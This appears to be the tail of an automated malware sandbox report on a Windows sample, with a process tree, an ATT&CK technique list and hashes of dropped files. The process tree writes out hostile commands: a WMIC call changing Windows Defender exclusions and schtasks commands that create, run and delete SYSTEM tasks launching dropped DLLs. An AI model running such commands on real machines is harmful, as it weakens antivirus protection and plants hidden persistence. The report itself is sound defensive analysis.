                                                                                                                                                                                                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                  PID:4688
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                          schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\rMvZmZ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                          PID:1956
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                          schtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\hAiabcU.xml" /RU "SYSTEM"
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                          PID:1980
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                          schtasks /END /TN "FPieTEPPuEmJrhC"
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:1656
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                            schtasks /DELETE /F /TN "FPieTEPPuEmJrhC"
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:1984
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                              schtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\JYtmmYy.xml" /RU "SYSTEM"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                              PID:240
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                              schtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\fobmcmb.xml" /RU "SYSTEM"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                              PID:4456
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                              schtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\hEdiKwK.xml" /RU "SYSTEM"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                              PID:1600
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                              schtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\HiCPpBP.xml" /RU "SYSTEM"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                              PID:3704
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                              schtasks /CREATE /TN "rrqYunoktxOQmCoCX" /SC once /ST 08:40:43 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\VIJfjSvH\hrhWQmE.dll\",#1 /hzdidCe 385118" /V1 /F
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                              PID:5000
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                              schtasks /run /I /tn "rrqYunoktxOQmCoCX"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:2472
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                schtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:1224
                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:3160
                                                                                                                                                                                                                                • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                                                  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\VIJfjSvH\hrhWQmE.dll",#1 /hzdidCe 385118
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:3200
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                      C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\VIJfjSvH\hrhWQmE.dll",#1 /hzdidCe 385118
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                      PID:2228
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                        schtasks /DELETE /F /TN "rrqYunoktxOQmCoCX"
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:4312

                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                                                                                    Execution

                                                                                                                                                                                                                                    Command and Scripting Interpreter

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1059

                                                                                                                                                                                                                                    PowerShell

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1059.001

                                                                                                                                                                                                                                    Scheduled Task/Job

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                    Persistence

                                                                                                                                                                                                                                    Create or Modify System Process

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1543

                                                                                                                                                                                                                                    Windows Service

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1543.003

                                                                                                                                                                                                                                    Pre-OS Boot

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1542

                                                                                                                                                                                                                                    Bootkit

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1542.003

                                                                                                                                                                                                                                    Scheduled Task/Job

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                    Privilege Escalation

                                                                                                                                                                                                                                    Create or Modify System Process

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1543

                                                                                                                                                                                                                                    Windows Service

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1543.003

                                                                                                                                                                                                                                    Scheduled Task/Job

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1053

                                                                                                                                                                                                                                    Defense Evasion

                                                                                                                                                                                                                                    Modify Registry

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1112

                                                                                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1497

                                                                                                                                                                                                                                    Pre-OS Boot

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1542

                                                                                                                                                                                                                                    Bootkit

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1542.003

                                                                                                                                                                                                                                    Credential Access

                                                                                                                                                                                                                                    Unsecured Credentials

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1552

                                                                                                                                                                                                                                    Credentials In Files

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1552.001

                                                                                                                                                                                                                                    Discovery

                                                                                                                                                                                                                                    Query Registry

                                                                                                                                                                                                                                    6
                                                                                                                                                                                                                                    T1012

                                                                                                                                                                                                                                    Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1497

                                                                                                                                                                                                                                    System Information Discovery

                                                                                                                                                                                                                                    6
                                                                                                                                                                                                                                    T1082

                                                                                                                                                                                                                                    Peripheral Device Discovery

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1120

                                                                                                                                                                                                                                    Collection

                                                                                                                                                                                                                                    Data from Local System

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1005

                                                                                                                                                                                                                                    Command and Control

                                                                                                                                                                                                                                    Web Service

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1102

                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                    • C:\$RECYCLE.BIN\S-1-5-18\desktop.ini
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      129B

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      a526b9e7c716b3489d8cc062fbce4005

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      2df502a944ff721241be20a9e449d2acd07e0312

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

                                                                                                                                                                                                                                    • C:\Program Files (x86)\ADJLsahCU\hAiabcU.xml
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      62b8dc206d0d31a30e7c038b88cbfe1b

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      b4673d844cabc5747d28ec9a9b51215a69bc2797

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      e121161347c1ab4f6a5d379eaf991db957d09c776a01802ba0f246ed0173cd3a

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      f3f0a403b768af8b749276821a2fbea2c1c6b7604a9444de1de5d4470e492f792c0bb35b672058464d61b79292c3802b254b8ab3e4f273c5cfbd92d326072251

                                                                                                                                                                                                                                    • C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\hEdiKwK.xml
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      bd837dd67fb0a2acfa7cf8debbff57e6

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      b10cb72a01c982c149aaae5e458e883b3c89ec31

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      4b7c9e987b25fad78b4ab71902784dac528d9eae6ea926abc3e3e38c2856847e

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      f96c756268341850b1321dc590ce32bb2d35c083718c78102799f9ed738c14b245ee5c382e3d4d77ee06dc6bd8eb48cec75547b7d1698d10b1f82d3dd829a447

                                                                                                                                                                                                                                    • C:\Program Files (x86)\DQANlvmTAvZU2\JYtmmYy.xml
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      a16185926b7c52f805cdf89fd3e11619

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      ff256c1b7762a797edeb0e2638970e02ec657389

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      15073046efb56e5a0692be7b62ff42fdceedc43711cabf5e41bfc7203444f14f

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      fc1c9b7dc14422264b519105e762ff05913be9cf0e5380f849bb19304a6ce2f0ceb24dfad5480e4937dc5f99d257b4b1556a6d0c80dcc9eb2c33c28025966068

                                                                                                                                                                                                                                    • C:\Program Files (x86)\PZjcxajBIsNTC\HiCPpBP.xml
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      69cc323787902ac9c7709c29c3f53b08

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      d57beda7cf06f00183a3352ab82d84ab1968f105

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      ff08189df92c319cfb95e87bc5d16d08303f0e85860bbb3df6a49470e419576b

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      8ded67cc40e4d49556dd8a586d63db2b6588c5d974cf66cff61b43a6292db90bb163aa2429182a4041dd642b9de76e5b8dc0c2f6ea6e5448fbd2520bbbce53c4

                                                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      2.0MB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      73f5f5e7c43883cfc6316482ad73b104

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      7591cda6173b60ee89446a0311ac172dd3b54500

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      cb03c34f95ddcfdfddb882ba032c562b126671b4cbfb6a4b4ca26dc410ce103e

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      11d328aac343611c552a692b9f10949388f0528f3124bebcd2d477913b9cf9b3a72f6842a03673c641a4ffbf5e38495999d8e97a34fa0d44bbba57c9828f0846

                                                                                                                                                                                                                                    • C:\ProgramData\VyWMmqtuSNndeGVB\fobmcmb.xml
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      20b3f9bb1d9a4c2a7e1b098220ebbea5

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      fb69fabcccca4a8ac2f72f6c4dc7a8e9bca6ead3

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      c85bbb28148f2117f07991cceac3d663d9927e5b612c389af24aec5bd2cec7f2

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      250ac50815694132b7a011677f04e6c6d49cc3109b2b1c1b2c6bcb719c03206104fbf25822b085b8d4a7285405500966efcab9d2b537a452c3952358be9ee278

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      187B

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      2a1e12a4811892d95962998e184399d8

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      136B

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      150B

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      11KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      117b7aa2f11581d3671747cbbf7b1509

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      ea735afea1d478cb9bd6fbcd7a1f53688a302042

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      514c4790d055b5d66538ff794cfe420a602724a718d6b36dea0ec9d3adc12f23

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      1d1df68c637d01c39dd6d772421bb66a6675f05fceb54a930c8da3c97f21361beb966d7150a7113c98240fda03a7c74419c5d239d0df87085163b4880dc4f66c

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      36KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      5d68f3ea9a6a25410a0a3c751a8c221e

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      b6e57e144731c512fa4f5d45f7d80a80fd208982

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      5c792a0427d56ce60df4df99935f824f4f5217b0d290c86af87e09cae6d4c201

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      c5dd75ed6ef51bb6a38d67bc401853889f640933a64a1f9466be83d1960b27ede9397549ef53bf6fb3ba56436c6acd4857e633d9b067dfea326ead472d4bfb69

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      627073ee3ca9676911bee35548eff2b8

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      1KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      faa2dd409bb88491b6c57728dbf8a673

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      6095f074030e7599cb1f9c251c62e2c0d1fb7418

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      955d02ee998eae94048f3a1b33c8eedc73276ef0a179efb1cebc970d9af0df09

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      0ab69299400998bc05fe7074b2c9b01162db9343deab22b502a26c47a054d2ca42918908fcc77a8cc5d275c17635508d546c3f65d857f37a7331ec9c32a766ce

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      151B

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      bd6b60b18aee6aaeb83b35c68fb48d88

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      9b977a5fbf606d1104894e025e51ac28b56137c3

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      944B

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      e3840d9bcedfe7017e49ee5d05bd1c46

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      272620fb2605bd196df471d62db4b2d280a363c6

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      3ac83e70415b9701ee71a4560232d7998e00c3db020fde669eb01b8821d2746f

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      76adc88ab3930acc6b8b7668e2de797b8c00edcfc41660ee4485259c72a8adf162db62c2621ead5a9950f12bfe8a76ccab79d02fda11860afb0e217812cac376

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      15KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      856d3349b6a8b203010cc0e54d6f04bf

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      3ad234f1a2e950baf0fc7faba7dbfb82596b0e1f

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      d15e38459e48b1a008b0f5e4b3cd7129592775c56fc8729951431296b1e9f206

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      ef81ee8cb56ac6a08489cc688bbe6bfd4c86963a8084f607dc127ad24b4ed47e922e6c17a6c4840e6ced272da643210c6cc2730281f8641e2861c8900829a5de

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      11KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      653839ef6ca3bce5875d554460b80921

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      2211e2c226ef3cf85d8ea84b551c9681422f2019

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      30f5a35261217bff661b3ef019cafb2ec8b1616b40db25a05a8f6e784b8594a2

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      d6b2a97d085fb1108f60856220459091e4e060561256f535dc1005de9df6f066d75044dd742e5e6de9f53a7255c5c14e024afb4c059478c101ca73f3608a22b5

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\[email protected]
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      656B

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      184a117024f3789681894c67b36ce990

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      c5b687db3b27ef04ad2b2cbc9f4e523cb7f6ba7e

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      b10d5fef165fc89e61cd16e02eac1b90b8f94ef95218bdd4b678cd0d5c8a925e

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      354d3bbc1329cbbe30d22f0cf95564e44acc68d6fe91e2beb4584a473d320faf4c092de9db7f1f93cf0b235703fc8de913883985c7d5db6b596244771a1edaf7

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.ini
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      830B

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      e6edb41c03bce3f822020878bde4e246

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      03198ad7bbfbdd50dd66ab4bed13ad230b66e4d9

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      9fa80f0889358d9db3d249a2e747e27b7c01c6123b784d94d169c0e54cacf454

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      2d71b7d50212f980e82562af95598c430aa0875f7a9d9cc670ba2cb1f63057fb26fd747a99cb4ca08f2355d002daa79bda2236b3ad9e37a3cfef32ae5420e2a1

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1716543391_00000000_base\360base.dll
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      1.0MB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      b192f34d99421dc3207f2328ffe62bd0

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      e4bbbba20d05515678922371ea787b39f064cd2c

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      58f13d919f44d194827b609b6b267246abc47134bb202472c0dfe033b9d7ed73

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      00d4c7a0a0097eb4b31a71a0eaf6ff0d44619f77a335c75688565e34e6d7f4fb6c258917457d560c6b0a5077603845ce012e01d9862e87fb5327d7f8da970f95

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524093638_240756031\7z.dll
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      1.1MB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      e74067bfda81cd82fe3a5fc2fdb87e2b

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      de961204751d9af1bab9c2a9ba16edc7a4ae7388

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      898bf5db34d9997b3d90b87091f34ae4e3e9cf34b6f2ae7fb8fd86e8a1bb684e

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      c0b1d851d97df2635b865d7f0a252881eef622363e08190e1f45ec308fdbd81f94ece53a6c2b1b36c38fcb82c2b8262f31a936a399cee567631b9146cf3ef60a

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524093638_240756031\temp_files\config\lang\de\SysSweeper.ui.dat
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      102KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      98a38dfe627050095890b8ed217aa0c5

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      3da96a104940d0ef2862b38e65c64a739327e8f8

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      794331c530f22c2390dd44d18e449c39bb7246868b07bdf4ff0be65732718b13

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      fb417aa5de938aaf01bb9a07a3cd42c338292438f5a6b17ef1b8d800a5605c72df81d3bae582e17162f6b1c5008fd63035fa7a637e07e2697cb1b34f9197a0cd

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524093638_240756031\temp_files\i18n\en\safemon\wd.ini
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      47383c910beff66e8aef8a596359e068

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      8ee1d273eca30e3fa84b8a39837e3a396d1b8289

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      b0a2dd51d75609b452a16fb26138fb95545212eb6efa274f2751eb74ccc5633f

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      3d307569452ec6d80056a3a2e0225d559606deab9a6c3913c1fef7ed6aca476d7a00190b1bbfa3d032411c2f52427f3096fce7b7952479ad9b75aa3cef59d7b0

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524093638_240756031\temp_files\i18n\es\deepscan\dsurls.dat
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      1KB

                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      69d457234e76bc479f8cc854ccadc21e

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      7f129438445bb1bde6b5489ec518cc8f6c80281b

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      b0355da8317155646eba806991c248185cb830fe5817562c50af71d297f269ee

                                                                                                                                                                                                                                      SHA512

